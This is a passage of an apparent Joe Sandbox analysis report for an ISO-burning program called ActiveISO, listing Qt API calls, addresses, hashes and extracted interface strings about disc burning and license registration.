                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A2C2
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A2E5
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A2F3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A2FE
                                                                                                                  • ?headerItem@QTreeWidget@@QEBAPEAVQTreeWidgetItem@@XZ.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A308
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A32E
                                                                                                                  • ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A33D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A348
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A36B
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A379
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A384
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A3A7
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A3B5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A3C0
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A3E3
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A3F1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A3FC
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A41F
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A430
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A43B
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A45E
                                                                                                                  • ?setItemText@QComboBox@@QEAAXHAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A471
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A47C
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A49F
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A4B0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A4BB
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A4DE
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A4EF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A4FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?setString@@@$Text@$?translate@Application@@Core$Label@@$AbstractButton@@$Tree$Item@@WidgetWidget@@$?headerBox@@ComboItemItem@Title@Window
                                                                                                                  • String ID: ...$<B>Burn ISO image file$<B>Finalizing$Auto-select$Burn$Burn ISO$Close$Details$Eject$Erase$ISO file$Speed$Target$burn_dialogClass
                                                                                                                  • API String ID: 688594888-3207037469
                                                                                                                  • Opcode ID: b771843c21481bb16e22b392afa43975bf9e67ad3f42666ad3bb0814f9a969dc
                                                                                                                  • Instruction ID: 576c34fd0a3460299cba1b54d5a88d003ebad78bfad36b3bfc9d7760ca0e7ccd
                                                                                                                  • Opcode Fuzzy Hash: b771843c21481bb16e22b392afa43975bf9e67ad3f42666ad3bb0814f9a969dc
                                                                                                                  • Instruction Fuzzy Hash: 05B14E72E24B4296EB009F60EC554A92722FB99F59B481631D52EF3AB8DF3CD51CC348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?set$String@@@Text@$?arg@Char@@Latin1$Edit@@$?fromArrayAscii_helper@Data@Label@@LineTyped$?text@$Array@@ByteDate@@Enabled@PlainString@V0@@V2@@Widget@@$AbstractButton@@Text
                                                                                                                  • String ID: &trade;$&trade;$<br><br>$<i>%1</i>%2 license activated on %3$<i>%1</i>%2 registered on %3$MMM dd, yyyy$MMM dd, yyyy$Online activation has not been completed yet, so removing local registration does not affect license availability.$Remove Registration
                                                                                                                  • API String ID: 107237987-1798900361
                                                                                                                  • Opcode ID: 5c9ab0b007e24df01f09b5880c4c52bb82b293bb0a0468a583b58091c1ad8ae2
                                                                                                                  • Instruction ID: 6f61530a757a4be1d5818569fce52654373dcbbeb9dfbf05cf440425de334e00
                                                                                                                  • Opcode Fuzzy Hash: 5c9ab0b007e24df01f09b5880c4c52bb82b293bb0a0468a583b58091c1ad8ae2
                                                                                                                  • Instruction Fuzzy Hash: 9DD13F22E24A029AF710DF71E8965AD2372FF85F55B851131EA0FB3AA4DF2CD548C384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?set$String@@$Widget@@$String@@@$Label@@$Name@Object@@$?fromObjectTextUtf8@Window$?translate@Application@@CoreFormat@Geometry@Rect@@Rect@@@$Bar@@Flags@ProgressQt@@@Qt@@@@@Text@$Button@@Modality@Size@Size@@Size@@@Type@Widget@@@$?object?resize@AbstractAlignmentAlignment@Flag@MaximumMinimumPushTitle@Value@Visible@malloc
                                                                                                                  • String ID: Cancel$Looking for CD/DVD/Blu-ray Devices$TextLabel$label$label_2$progressBar$pushButton$wait_form$wait_formClass
                                                                                                                  • API String ID: 3163988716-2694957620
                                                                                                                  • Opcode ID: dce3ef646c756c42ed1f13e96e6a4ab6e4241c58d927ccb5767f36417ba4eacf
                                                                                                                  • Instruction ID: 33113a879f63410f88ebed347ea7ffecdbcfbc3a00b076276f8ed9f1e7f01799
                                                                                                                  • Opcode Fuzzy Hash: dce3ef646c756c42ed1f13e96e6a4ab6e4241c58d927ccb5767f36417ba4eacf
                                                                                                                  • Instruction Fuzzy Hash: FBC17B32A24A4296EB10DF21EC551A97372FB89F99B444131CA5EB3BB8DF3CD509C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Tree$?set$Item@@Widget$?translate@Application@@CoreString@@@$Text@$Enabled@SortingView@@Widget@@$Item@$?header?topLevelTitle@Window
                                                                                                                  • String ID: Date Modified$Name$Path$Root of the image$Size$Type$comboName$import$mytreewidget$mytreewidgetClass$offSet$pNode
                                                                                                                  • API String ID: 971604307-2245301762
                                                                                                                  • Opcode ID: 4c780729cd528d44e079bdbc67f1e30d4f8470b4bf66d3f8dbedc454679f8de2
                                                                                                                  • Instruction ID: bed01ba54ebe62288ad7771a991d8edab169c3637790a1941cf47f3e39307899
                                                                                                                  • Opcode Fuzzy Hash: 4c780729cd528d44e079bdbc67f1e30d4f8470b4bf66d3f8dbedc454679f8de2
                                                                                                                  • Instruction Fuzzy Hash: 53A16072E24B4396E7109F60FC155A92322FB8AF99B491231D55EB3AB4DF3CD609C348
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537561C4
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537561EE
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537561F9
                                                                                                                    • Part of subcall function 00007FF653744620: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744681
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF653756223
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756233
                                                                                                                  • ?hide@QWidget@@QEAAXXZ.QT5WIDGETS ref: 00007FF653756242
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446BC
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446E0
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744700
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF65374472B
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744938
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653744946
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF653756255
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65375626D
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653756283
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF65375629B
                                                                                                                  • ?setPixmap@QLabel@@QEAAXAEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF6537562A9
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF6537562B4
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537562BF
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537562E9
                                                                                                                  • ?show@QWidget@@QEAAXXZ.QT5WIDGETS ref: 00007FF65375657E
                                                                                                                    • Part of subcall function 00007FF653756D30: ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS(?,?,?,00007FF65375621B), ref: 00007FF653756D40
                                                                                                                    • Part of subcall function 00007FF653756D30: ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE(?,?,?,00007FF65375621B), ref: 00007FF653756D5A
                                                                                                                    • Part of subcall function 00007FF653756D30: ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS(?,?,?,00007FF65375621B), ref: 00007FF653756D63
                                                                                                                    • Part of subcall function 00007FF653756D30: ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS(?,?,?,00007FF65375621B), ref: 00007FF653756D74
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653756300
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF653756318
                                                                                                                  • ?setPixmap@QLabel@@QEAAXAEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF653756326
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF653756331
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65375633C
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF65375634A
                                                                                                                    • Part of subcall function 00007FF6537421A0: ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE ref: 00007FF6537421C7
                                                                                                                    • Part of subcall function 00007FF6537421A0: ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF6537421D1
                                                                                                                    • Part of subcall function 00007FF6537421A0: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6537421E5
                                                                                                                    • Part of subcall function 00007FF6537421A0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537421F1
                                                                                                                    • Part of subcall function 00007FF6537421A0: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65374220D
                                                                                                                    • Part of subcall function 00007FF6537421A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374221C
                                                                                                                    • Part of subcall function 00007FF6537421A0: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742243
                                                                                                                    • Part of subcall function 00007FF6537421A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742256
                                                                                                                    • Part of subcall function 00007FF6537421A0: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF653742270
                                                                                                                    • Part of subcall function 00007FF6537421A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374227C
                                                                                                                    • Part of subcall function 00007FF6537421A0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742288
                                                                                                                    • Part of subcall function 00007FF6537421A0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742294
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65375635E
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF65375636C
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537422DB
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF6537422FE
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742311
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374232B
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742337
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742343
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653742353
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374235F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756380
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374287A
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742885
                                                                                                                    • Part of subcall function 00007FF653742820: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374289C
                                                                                                                    • Part of subcall function 00007FF653742820: ??0QVariant@@QEAA@PEBD@Z.QT5CORE ref: 00007FF6537428BF
                                                                                                                    • Part of subcall function 00007FF653742820: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537428D2
                                                                                                                    • Part of subcall function 00007FF653742820: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF6537428E8
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537428F3
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF6537428FE
                                                                                                                    • Part of subcall function 00007FF653742820: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742910
                                                                                                                    • Part of subcall function 00007FF653742820: ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF65374291E
                                                                                                                    • Part of subcall function 00007FF653742820: ?toString@QDate@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF65374292F
                                                                                                                    • Part of subcall function 00007FF653742820: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FF65374293F
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742949
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742954
                                                                                                                    • Part of subcall function 00007FF653742820: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742965
                                                                                                                    • Part of subcall function 00007FF653742820: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742978
                                                                                                                    • Part of subcall function 00007FF653742820: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374298E
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742999
                                                                                                                    • Part of subcall function 00007FF653742820: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF6537429A4
                                                                                                                    • Part of subcall function 00007FF653742820: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537429B6
                                                                                                                    • Part of subcall function 00007FF653742820: ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF6537429C8
                                                                                                                    • Part of subcall function 00007FF653744960: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF6537449A6
                                                                                                                    • Part of subcall function 00007FF653744960: ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF6537449C9
                                                                                                                    • Part of subcall function 00007FF653744960: ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF6537449D3
                                                                                                                    • Part of subcall function 00007FF653744960: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537449F0
                                                                                                                    • Part of subcall function 00007FF653744960: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537449FC
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65375639C
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF6537563AB
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF6537563BC
                                                                                                                    • Part of subcall function 00007FF653744340: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65374437E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537563DE
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537563E9
                                                                                                                  • ?show@QWidget@@QEAAXXZ.QT5WIDGETS ref: 00007FF6537563FB
                                                                                                                    • Part of subcall function 00007FF653757B80: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653757BA6
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653756427
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653756437
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF653756453
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653756468
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653756478
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF653756494
                                                                                                                    • Part of subcall function 00007FF65371F860: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65371F87D
                                                                                                                    • Part of subcall function 00007FF65371F860: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF65371F891
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537564BF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537564CA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537564D5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537564E0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537564EB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537564F6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756501
                                                                                                                  • ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FF653756519
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756523
                                                                                                                  • ?setPlainText@QPlainTextEdit@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65375653D
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF653756549
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF653756555
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756574
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Typed$?set$Array@@Byte$Settings@@Variant@@$Edit@@String@@@$?text@Line$Widget@@$Char@@@Label@@Pixmap@@V0@@Value@Variant@@@$Date@@Text@WizardWizard@@$?arg@?current?data@?show@?wizard@Char@@ConversionDate@Enabled@Flag@Flags@ImageLatin1Latin1@Object@@Page@@Pixmap@Pixmap@@@PlainQt@@@@@V0@$$$?append@?disconnect@?hide@?remove@?tr@D01@MetaOption@Option@1@_String@TextV1@@V2@@strncpy
                                                                                                                  • String ID: :/images/Invalid.png$:/images/Valid.png$<b>%1:</b> $<font color=red>%1</font>$Request Error
                                                                                                                  • API String ID: 1587888657-3812837065
                                                                                                                  • Opcode ID: 886e95917defd12e2f8630cf60c9efe789635d0e7bdc23b47f5e839f07d5569b
